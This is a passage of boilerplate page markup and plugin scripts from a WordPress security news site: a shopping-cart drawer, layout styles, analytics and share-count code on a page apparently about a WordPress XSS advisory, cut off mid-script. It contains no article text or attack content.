<!-- Render the cart. --> <div class="is-layout-flow wp-container-surecart-slide-out-cart-is-layout-d6743c7d wp-block-slide-out-cart-is-layout-flow" data-wp-context='{"formId":131,"mode":"live"}' data-wp-interactive='{ "namespace": "surecart/checkout" }' data-wp-init="callbacks.init" data-wp-watch="callbacks.onChangeCheckout" data-wp-on-window--storage="callbacks.syncTabs" > <dialog style="width: 525px; font-size:15px;" class="sc-drawer sc-cart-drawer wp-block-surecart-slide-out-cart" data-wp-bind--aria-label="surecart/cart::state.ariaLabel" data-wp-on--mousedown="surecart/cart::actions.closeOverlay" data-wp-on--touchstart="surecart/cart::actions.closeOverlay" > <!-- Cart alert --> <div class="sc-alert sc-alert__alert--danger" role="alert" aria-live="assertive" aria-atomic="true" data-wp-bind--hidden="!state.error" hidden > <div class="sc-alert__icon"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10" /> <line x1="12" y1="8" x2="12" y2="12" /> <line x1="12" y1="16" x2="12.01" y2="16" /> </svg> </div> <div class="sc-alert__text"> <div class="sc-alert__title"> <span data-wp-text="state.errorTitle"></span> </div> <div class="sc-alert__message"> <div data-wp-text="state.errorMessage"></div> <template data-wp-each--message="state.additionalErrors"> <div> <span data-wp-text="context.message"></span> </div> </template> </div> </div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-09de181c wp-block-group-is-layout-flex" style="padding-top:1.5em;padding-right:2em;padding-bottom:0em;padding-left:2em"> <div style="line-height:1;" class="wp-block-surecart-cart-close-button" data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keypress="surecart/cart::actions.toggle" role="button" tabindex="0" aria-label="Close cart" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> <polyline points="12 5 19 12 12 19" /> </svg> </div> <p style="margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;font-size:16px;font-style:normal;font-weight:500;line-height:1"> Review My Order</p> <span style="font-size:14px;font-weight:600;line-height:1; border-radius:4px; padding-top:6px;padding-bottom:6px;padding-left:10px;padding-right:10px;" class="wp-block-surecart-cart-count" data-wp-text="state.itemsCount">0</span> </div> <div style="padding-top:2em;padding-bottom:2em;padding-left:2em;padding-right:2em;" class="wp-block-surecart-slide-out-cart-line-items is-layout-flow wp-container-surecart-slide-out-cart-line-items-is-layout-546f3c6d wp-block-slide-out-cart-line-items-is-layout-flow" role="list"> <template data-wp-each--line_item="state.checkoutLineItems" data-wp-each-key="context.line_item.id" > <div class="sc-product-line-item" data-wp-class--sc-product-line-item--has-swap="state.swap" role="listitem"> <div class="sc-product-line-item__content"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-bd3f9bef wp-block-group-is-layout-flex"> <figure class="sc-cart-line-item-image-wrap wp-container-content-962be591 wp-duotone-unset-1" data-wp-bind--hidden="!context.line_item.image.src"> <img style="aspect-ratio:1;border-radius:4px;border-width:1px;margin-top:0;margin-bottom:0; margin-top:0;margin-bottom:0;" class="sc-is-covered wp-block-surecart-cart-line-item-image" data-wp-bind--alt="context.line_item.image.alt" data-wp-bind--srcset="context.line_item.image.srcset" data-wp-bind--sizes="context.line_item.image.sizes" data-wp-bind--src="context.line_item.image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-content-justification-stretch is-nowrap is-layout-flex wp-container-core-group-is-layout-a46423eb wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-d63c796e wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <a style="font-style:normal;font-weight:500;line-height:1.4;text-decoration:none;" class="wp-block-surecart-cart-line-item-title" data-wp-bind--href="state.lineItemPermalink"> <span data-wp-text="context.line_item.price.product.name"></span> </a> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-price-name" data-wp-text="state.lineItemPriceName" data-wp-bind--hidden="!state.lineItemPriceName"></div> <div style="font-size:14px;line-height:1.4;" class="wp-block-surecart-cart-line-item-variant" data-wp-text="state.lineItemVariant" data-wp-bind--hidden="!state.lineItemVariant"></div> </div></div> <div class="sc-product-line-item__purchasable-status wp-block-surecart-cart-line-item-status has-text-align-right" data-wp-text="context.line_item.purchasable_status_display" data-wp-bind--hidden="!context.line_item.purchasable_status_display" role="status" aria-live="polite" aria-atomic="true" > </div> </div></div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f8a47911 wp-block-group-is-layout-flex" style="line-height:1.4"> <div class="wp-block-surecart-cart-line-item-scratch-amount" data-wp-text="context.line_item.scratch_display_amount" data-wp-bind--hidden="!state.lineItemHasScratchAmount" ></div> <div style="font-style:normal;font-weight:500;" class="wp-block-surecart-cart-line-item-amount has-text-align-right" data-wp-text="context.line_item.subtotal_display_amount"></div> <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text"> <span class="wp-block-surecart-cart-line-item-interval__interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text" data-wp-text="context.line_item.price.short_interval_text" ></span> <span class="wp-block-surecart-cart-line-item-interval__count" data-wp-bind--hidden="!context.line_item.price.short_interval_count_text" data-wp-text="context.line_item.price.short_interval_count_text" ></span> </div> </div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-trial has-text-align-right" data-wp-bind--hidden="!context.line_item.price.trial_text" data-wp-text="context.line_item.price.trial_text" ></div> <template data-wp-each--fee="state.lineItemFees" data-wp-each-key="context.fee.id" > <div style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right"> <span style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.display_amount" ></span> <span style="font-size:14px;" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.description" ></span> </div> </template> </div></div> </div></div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-c0dd7891 wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><div class="sc-input-group sc-input-group-sm sc-quantity-selector wp-block-surecart-cart-line-item-quantity" data-wp-class--quantity--disabled="state.isQuantityDisabled" data-wp-bind--hidden="!state.isEditable" hidden="1"> <div class="sc-input-group-text sc-quantity-selector__decrease" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityDecrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityDecrease" data-wp-bind--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityDecreaseDisabled" data-wp-class--button--disabled="state.isQuantityDecreaseDisabled" aria-label="Decrease quantity by one." > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> <input type="number" class="sc-form-control sc-quantity-selector__control" data-wp-bind--value="context.line_item.quantity" data-wp-on--change="surecart/checkout::actions.onQuantityChange" data-wp-bind--min="context.line_item.min" data-wp-bind--aria-valuemin="context.line_item.min" data-wp-bind--max="context.line_item.max" data-wp-bind--aria-valuemax="context.line_item.max" data-wp-bind--disabled="surecart/checkout::state.loading" step="1" autocomplete="off" role="spinbutton" /> <div class="sc-input-group-text sc-quantity-selector__increase" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityIncrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityIncrease" data-wp-bind--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityIncreaseDisabled" data-wp-class--button--disabled="state.isQuantityIncreaseDisabled" aria-label="Increase quantity by one." > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> </div> </div></div> <div class="wp-block-group is-vertical is-content-justification-right is-layout-flex wp-container-core-group-is-layout-4269a6fd wp-block-group-is-layout-flex"> <div style="font-size:14px;font-style:normal;font-weight:400;" class="wp-block-surecart-cart-line-item-remove" aria-label="Remove item" data-wp-on--click="surecart/checkout::actions.removeLineItem" data-wp-on--keydown="surecart/checkout::actions.removeLineItem" role="button" tabindex="0" > <svg class="wp-block-surecart-cart-line-item-remove__icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="18" y1="6" x2="6" y2="18" /> <line x1="6" y1="6" x2="18" y2="18" /> </svg> <span class="wp-block-surecart-cart-line-item-remove__label"> Remove </span> </div> </div> </div> </div> </div> </div></div> </div> <div class="sc-product-line-item__swap" data-wp-bind--hidden="!state.swap" hidden data-wp-on--click="actions.toggleSwap"> <div class="sc-product-line-item__swap-content"> <button type="button" class="sc-toggle" role="switch" aria-checked="false" data-wp-bind--aria-checked="context.line_item.swap" data-wp-class--sc-toggle--checked="context.line_item.swap"> <span class="sc-toggle__label">Use setting</span> <span aria-hidden="true" class="sc-toggle__knob"></span> </button> <span data-wp-text="state.swap.description"></span> </div> <div class="sc-product-line-item__swap-amount"> <span data-wp-text="state.swapDisplayAmount" class="sc-product-line-item__swap-amount-value"></span> <span data-wp-text="state.swapIntervalText" class="sc-product-line-item__swap-amount-interval"></span> <span data-wp-text="state.swapIntervalCountText" class="sc-product-line-item__swap-amount-interval-count"></span> </div> </div> </div> </template> </div> <div class="wp-block-group" style="border-top-color:#b0b0b069;border-top-width:1px;padding-top:2em;padding-right:2em;padding-bottom:2em;padding-left:2em"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div class="wp-block-surecart-slide-out-cart-items-subtotal is-content-justification-space-between is-nowrap is-layout-flex wp-container-surecart-slide-out-cart-items-subtotal-is-layout-7351673c wp-block-slide-out-cart-items-subtotal-is-layout-flex"> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-d6743c7d wp-block-group-is-layout-flow"> <p style="margin-top:0px;margin-bottom:0px;font-size:18px;font-style:normal;font-weight:500;line-height:1.4"> Subtotal</p> <p class="has-text-color has-link-color wp-elements-259a359c4f6cc8e462a71fb52c1b4088" style="color:var(--sc-input-help-text-color);font-size:14px;line-height:1.4">Taxes & shipping calculated at checkout</p> </div></div> <span style="font-size:18px;font-style:normal;font-weight:500;line-height:1.4;" class="wp-block-surecart-cart-subtotal-amount" data-wp-text="state.checkout.subtotal_display_amount"></span> </div> <div class="sc-cart-items-submit__wrapper" style="" > <div class="wp-block-button"> <a style="border-radius:4px;" class="wp-block-button__link wp-element-button sc-button__link wp-block-surecart-slide-out-cart-items-submit" href="https://wp-security.org/checkout/" class="wp-block-button__link wp-element-button sc-button__link" data-wp-bind--disabled="state.loading" data-wp-class--sc-button__link--busy="state.loading" > <span class="sc-spinner" aria-hidden="false"></span> <span class="sc-button__link-text">Checkout</span> </a> </div> </div> </div></div> <div class="sc-block-ui" data-wp-bind--hidden="!state.loading" hidden></div> <!-- speak element --> <p id="a11y-speak-intro-text" class="a11y-speak-intro-text" style="position: absolute;margin: -1px;padding: 0;height: 1px;width: 1px;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;"></p> <div id="a11y-speak-assertive" class="a11y-speak-region" style="position: absolute;margin: -1px;padding: 0;height: 1px;width: 1px;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"> </div> <div id="a11y-speak-polite" class="a11y-speak-region" style="position: absolute;margin: -1px;padding: 0;height: 1px;width: 1px;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div> </dialog> </div> <!-- Render floating cart icon --> <div data-wp-interactive='{ "namespace": "surecart/checkout" }' class="wp-block-surecart-cart-icon" data-wp-context='{"formId":131,"mode":"live"}' data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keydown="surecart/cart::actions.toggle" tabindex="0" role="button" data-wp-bind--hidden="!state.hasItems" hidden > <div class="wp-block-surecart-cart-icon__container"> <div class="wp-block-surecart-cart-icon__icon" aria-label="Cart Button."> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <path d="M6 2L3 6v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V6l-3-4z" /> <line x1="3" y1="6" x2="21" y2="6" /> <path d="M16 10a4 4 0 0 1-8 0" /> </svg> </div> <span class="wp-block-surecart-cart-icon__count" data-wp-text="state.itemsCount" data-wp-bind--aria-label="state.itemsCountAriaLabel" >0</span> </div> </div><style id='core-block-supports-inline-css'>
.wp-container-core-group-is-layout-09de181c{flex-wrap:nowrap;justify-content:space-between;}.wp-container-content-962be591{flex-basis:80px;}.wp-container-core-group-is-layout-d6743c7d > *{margin-block-start:0;margin-block-end:0;}.wp-container-core-group-is-layout-d6743c7d > * + *{margin-block-start:0px;margin-block-end:0;}.wp-container-content-9cfa9a5a{flex-grow:1;}.wp-container-core-group-is-layout-f8a47911{flex-wrap:nowrap;gap:4px;justify-content:flex-end;}.wp-container-core-group-is-layout-d63c796e{flex-wrap:nowrap;justify-content:space-between;align-items:stretch;}.wp-container-core-group-is-layout-4269a6fd{gap:0px;flex-direction:column;align-items:flex-end;}.wp-container-core-group-is-layout-c0dd7891{flex-wrap:nowrap;justify-content:space-between;align-items:center;}.wp-container-core-group-is-layout-a46423eb{flex-wrap:nowrap;gap:5px;flex-direction:column;align-items:stretch;justify-content:flex-start;}.wp-container-core-group-is-layout-bd3f9bef{flex-wrap:nowrap;align-items:stretch;}.wp-container-surecart-slide-out-cart-line-items-is-layout-546f3c6d > *{margin-block-start:0;margin-block-end:0;}.wp-container-surecart-slide-out-cart-line-items-is-layout-546f3c6d > * + *{margin-block-start:2em;margin-block-end:0;}.wp-elements-259a359c4f6cc8e462a71fb52c1b4088 a:where(:not(.wp-element-button)){color:var(--sc-input-help-text-color);}.wp-container-surecart-slide-out-cart-items-subtotal-is-layout-7351673c{flex-wrap:nowrap;justify-content:space-between;align-items:flex-start;}.wp-container-surecart-slide-out-cart-is-layout-d6743c7d > *{margin-block-start:0;margin-block-end:0;}.wp-container-surecart-slide-out-cart-is-layout-d6743c7d > * + *{margin-block-start:0px;margin-block-end:0;}.wp-duotone-unset-1.wp-block-surecart-cart-line-item-image{filter:unset;}
</style>
<style id='core-block-supports-duotone-inline-css'>
.wp-duotone-unset-1.wp-block-surecart-cart-line-item-image{filter:unset;}
</style>
<script src="https://wp-security.org/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/url.min.js?ver=c2964167dfe2477c14ea" id="wp-url-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6" id="wp-hooks-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6" id="wp-i18n-js"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script src="https://wp-security.org/wp-includes/js/dist/api-fetch.min.js?ver=3623a576c78df404ff20" id="wp-api-fetch-js"></script>
<script id="wp-api-fetch-js-after">
wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "https://wp-security.org/wp-json/" ) );
wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "a868770e15" );
wp.apiFetch.use( wp.apiFetch.nonceMiddleware );
wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );
wp.apiFetch.nonceEndpoint = "https://wp-security.org/wp-admin/admin-ajax.php?action=rest-nonce";
</script>
<script src="https://wp-security.org/wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381" id="wp-dom-ready-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14" id="wp-a11y-js"></script>
<script src="https://wp-security.org/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.1" id="regenerator-runtime-js"></script>
<script id="surecart-components-js-extra">
var surecartComponents = {"url":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/dist\/components\/surecart\/surecart.esm.js?ver=1754141026"};
var scData = {"cdn_root":"https:\/\/surecart.com\/cdn-cgi\/image","root_url":"https:\/\/wp-security.org\/wp-json\/","plugin_url":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart","home_url":"https:\/\/wp-security.org","api_url":"https:\/\/api.surecart.com\/v1\/","currency":"usd","currency_symbol":"$","theme":"light","pages":{"dashboard":"https:\/\/wp-security.org\/customer-dashboard\/","checkout":"https:\/\/wp-security.org\/checkout\/"},"page_id":"","nonce":"a868770e15","nonce_endpoint":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php?action=sc-rest-nonce","recaptcha_site_key":"","claim_url":"","admin_url":"https:\/\/wp-security.org\/wp-admin\/","getting_started_url":"https:\/\/wp-security.org\/wp-admin\/admin.php?page=sc-getting-started","user_permissions":{"manage_sc_shop_settings":false},"is_account_connected":"1"};
var scIcons = {"path":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/dist\/icon-assets"};
</script>
<script src="https://wp-security.org/wp-content/plugins/surecart/dist/components/static-loader.js?ver=c588f0555cdc032c647e-3.11.0" id="surecart-components-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/basic-elements/block-alert/public-block-alert.js?ver=2.5.1" id="canvas-block-alert-script-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/basic-elements/block-collapsibles/public-block-collapsibles.js?ver=2.5.1" id="canvas-block-collapsibles-script-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/basic-elements/block-tabs/public-block-tabs.js?ver=2.5.1" id="canvas-block-tabs-script-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/posts/block-posts/colcade.js?ver=2.5.1" id="colcade-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/posts/block-posts/public-block-posts.js?ver=2.5.1" id="canvas-block-posts-script-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/justified-gallery/block/jquery.justifiedGallery.min.js?ver=2.5.1" id="justifiedgallery-js"></script>
<script id="canvas-justified-gallery-js-extra">
var canvasJG = {"rtl":""};
</script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/justified-gallery/block/public-block-justified-gallery.js?ver=2.5.1" id="canvas-justified-gallery-js"></script>
<script src="https://wp-security.org/wp-includes/js/imagesloaded.min.js?ver=5.0.0" id="imagesloaded-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/slider-gallery/block/flickity.pkgd.min.js?ver=2.5.1" id="flickity-js"></script>
<script id="canvas-slider-gallery-js-extra">
var canvas_sg_flickity = {"page_info_sep":" of "};
</script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/slider-gallery/block/public-block-slider-gallery.js?ver=2.5.1" id="canvas-slider-gallery-js"></script>
<script src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.1" id="swv-js"></script>
<script id="contact-form-7-js-before">
var wpcf7 = {
"api": {
"root": "https:\/\/wp-security.org\/wp-json\/",
"namespace": "contact-form-7\/v1"
},
"cached": 1
};
</script>
<script src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.1" id="contact-form-7-js"></script>
<script id="disqus_count-js-extra">
var countVars = {"disqusShortname":"wp-security-org"};
</script>
<script src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.1.3" id="disqus_count-js"></script>
<script id="disqus_embed-js-extra">
var embedVars = {"disqusConfig":{"integration":"wordpress 3.1.3 6.8.2"},"disqusIdentifier":"803 https:\/\/wp-security.org\/uncategorized\/hong-kong-security-ngo-warns-wordpress-xsscve20258685\/","disqusShortname":"wp-security-org","disqusTitle":"Hong Kong Security NGO warns WordPress XSS(CVE20258685)","disqusUrl":"https:\/\/wp-security.org\/vulnerability-database\/hong-kong-security-ngo-warns-wordpress-xsscve20258685\/","postId":"803"};
</script>
<script src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_embed.js?ver=3.1.3" id="disqus_embed-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/basic-elements/public/js/public-powerkit-basic-elements.js?ver=4.0.0" id="powerkit-basic-elements-js"></script>
<script id="powerkit-justified-gallery-js-extra">
var powerkitJG = {"rtl":""};
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/justified-gallery/public/js/public-powerkit-justified-gallery.js?ver=3.0.2" id="powerkit-justified-gallery-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/glightbox.min.js?ver=3.0.2" id="glightbox-js"></script>
<script id="powerkit-lightbox-js-extra">
var powerkit_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of","single_image_selectors":".entry-content img,.single .post-media img","gallery_selectors":".wp-block-gallery,.gallery","exclude_selectors":".sight-portfolio-area","zoom_icon":"1"};
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/public-powerkit-lightbox.js?ver=3.0.2" id="powerkit-lightbox-js"></script>
<script id="powerkit-opt-in-forms-js-extra">
var opt_in = {"ajax_url":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php","warning_privacy":"Please confirm that you agree with our policies.","is_admin":"","server_error":"Server error occurred. Please try again later."};
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/opt-in-forms/public/js/public-powerkit-opt-in-forms.js?ver=3.0.2" id="powerkit-opt-in-forms-js"></script>
<script async="async" defer="defer" src="//assets.pinterest.com/js/pinit.js?ver=6.8.2" id="powerkit-pinterest-js"></script>
<script id="powerkit-pin-it-js-extra">
var powerkit_pinit_localize = {"image_selectors":".entry-content img","exclude_selectors":".cnvs-block-row,.cnvs-block-section,.cnvs-block-posts .entry-thumbnail,.cnvs-post-thumbnail,.pk-block-author,.pk-featured-categories img,.pk-inline-posts-container img,.pk-instagram-image,.pk-subscribe-image,.wp-block-cover,.pk-block-posts,.sight-portfolio-entry-link-page","only_hover":"1"};
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/pinterest/public/js/public-powerkit-pin-it.js?ver=3.0.2" id="powerkit-pin-it-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/scroll-to-top/public/js/public-powerkit-scroll-to-top.js?ver=3.0.2" id="powerkit-scroll-to-top-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/share-buttons/public/js/public-powerkit-share-buttons.js?ver=3.0.2" id="powerkit-share-buttons-js"></script>
<script id="powerkit-slider-gallery-js-extra">
var powerkit_sg_flickity = {"page_info_sep":" of "};
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/slider-gallery/public/js/public-powerkit-slider-gallery.js?ver=3.0.2" id="powerkit-slider-gallery-js"></script>
<script id="powerkit-table-of-contents-js-extra">
var powerkit_toc_config = {"label_show":"Show","label_hide":"Hide"};
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/table-of-contents/public/js/public-powerkit-table-of-contents.js?ver=3.0.2" id="powerkit-table-of-contents-js"></script>
<script src="https://wp-security.org/wp-content/plugins/sight/render/js/jquery.magnific-popup.min.js?ver=1754493394" id="magnific-popup-js"></script>
<script id="sight-block-script-js-extra">
var sight_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of"};
</script>
<script src="https://wp-security.org/wp-content/plugins/sight/render/js/sight.js?ver=1754493394" id="sight-block-script-js"></script>
<script src="https://wp-security.org/wp-content/themes/squaretype/js/ofi.min.js?ver=3.2.3" id="object-fit-images-js"></script>
<script id="csco-scripts-js-extra">
var csco_mega_menu = {"rest_url":"https:\/\/wp-security.org\/wp-json\/csco\/v1\/menu-posts","current_lang":"","current_locale":"en_US"};
</script>
<script src="https://wp-security.org/wp-content/themes/squaretype/js/scripts.js?ver=3.1.1" id="csco-scripts-js"></script>
<script src="https://wp-security.org/wp-includes/js/comment-reply.min.js?ver=6.8.2" id="comment-reply-js" async data-wp-strategy="async"></script>
<script id="swp-live-search-client-js-extra">
var searchwp_live_search_params = [];
searchwp_live_search_params = {"ajaxurl":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php","origin_id":803,"config":{"default":{"engine":"default","input":{"delay":300,"min_chars":3},"results":{"position":"bottom","width":"auto","offset":{"x":0,"y":5}},"spinner":{"lines":12,"length":8,"width":3,"radius":8,"scale":1,"corners":1,"color":"#424242","fadeColor":"transparent","speed":1,"rotate":0,"animation":"searchwp-spinner-line-fade-quick","direction":1,"zIndex":2000000000,"className":"spinner","top":"50%","left":"50%","shadow":"0 0 1px transparent","position":"absolute"}}},"msg_no_config_found":"No valid SearchWP Live Search configuration found!","aria_instructions":"When autocomplete results are available use up and down arrows to review and enter to go to the desired page. Touch device users, explore by touch or with swipe gestures."};;
</script>
<script src="https://wp-security.org/wp-content/plugins/searchwp-live-ajax-search/assets/javascript/dist/script.min.js?ver=1.8.6" id="swp-live-search-client-js"></script>
<!-- Usermaven - privacy-friendly analytics tool -->
<script type="text/javascript">
(function () {
window.usermaven = window.usermaven || (function () { (window.usermavenQ = window.usermavenQ || []).push(arguments); })
var t = document.createElement('script'),
s = document.getElementsByTagName('script')[0];
t.defer = true;
t.id = 'um-tracker';
t.setAttribute('data-tracking-host', 'https://u.wp-security.org');
t.setAttribute('data-key', 'UMZaYew9Sp');
t.setAttribute('data-autocapture', 'true'); t.setAttribute('data-randomize-url', 'true');
t.src = 'https://u.wp-security.org/lib.js';
s.parentNode.insertBefore(t, s);
})();
</script>
<!-- / Usermaven -->
<script type="text/javascript">
"use strict";
(function($) {
$( window ).on( 'load', function() {
// Each All Share boxes.
$( '.pk-share-buttons-mode-rest' ).each( function() {
var powerkitButtonsIds = [],
powerkitButtonsBox = $( this );
// Check Counts.
if ( ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-counts' ) && ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) ) {
return;
}
powerkitButtonsBox.find( '.pk-share-buttons-item' ).each( function() {
if ( $( this ).attr( 'data-id' ).length > 0 ) {
powerkitButtonsIds.push( $( this ).attr( 'data-id' ) );
}
});
// Generate accounts data.
var powerkitButtonsData = {};
if( powerkitButtonsIds.length > 0 ) {
powerkitButtonsData = {
'ids' : powerkitButtonsIds.join(),
'post_id' : powerkitButtonsBox.attr( 'data-post-id' ),
'url' : powerkitButtonsBox.attr( 'data-share-url' ),
};
}
// Get results by REST API.
$.ajax({
type: 'GET',
url: 'https://wp-security.org/wp-json/social-share/v1/get-shares',
data: powerkitButtonsData,
beforeSend: function(){
// Add Loading Class.
powerkitButtonsBox.addClass( 'pk-share-buttons-loading' );
},
success: function( response ) {
if ( ! $.isEmptyObject( response ) && ! response.hasOwnProperty( 'code' ) ) {
// Accounts loop.
$.each( response, function( index, data ) {
if ( index !== 'total_count' ) {
// Find Bsa Item.
var powerkitButtonsItem = powerkitButtonsBox.find( '.pk-share-buttons-item[data-id="' + index + '"]');
// Set Count.
if ( data.hasOwnProperty( 'count' ) && data.count ) {
powerkitButtonsItem.removeClass( 'pk-share-buttons-no-count' ).addClass( 'pk-share-buttons-item-count' );
powerkitButtonsItem.find( '.pk-share-buttons-count' ).html( data.count );
} else {
powerkitButtonsItem.addClass( 'pk-share-buttons-no-count' );
}
}
});
if ( powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) && response.hasOwnProperty( 'total_count' ) ) {
var powerkitButtonsTotalBox = powerkitButtonsBox.find( '.pk-share-buttons-total' );
if ( response.total_count ) {
powerkitButtonsTotalBox.find( '.pk-share-buttons-count' ).html( response.total_count );
powerkitButtonsTotalBox.show().removeClass( 'pk-share-buttons-total-no-count' );
}
}
}
// Remove Loading Class.
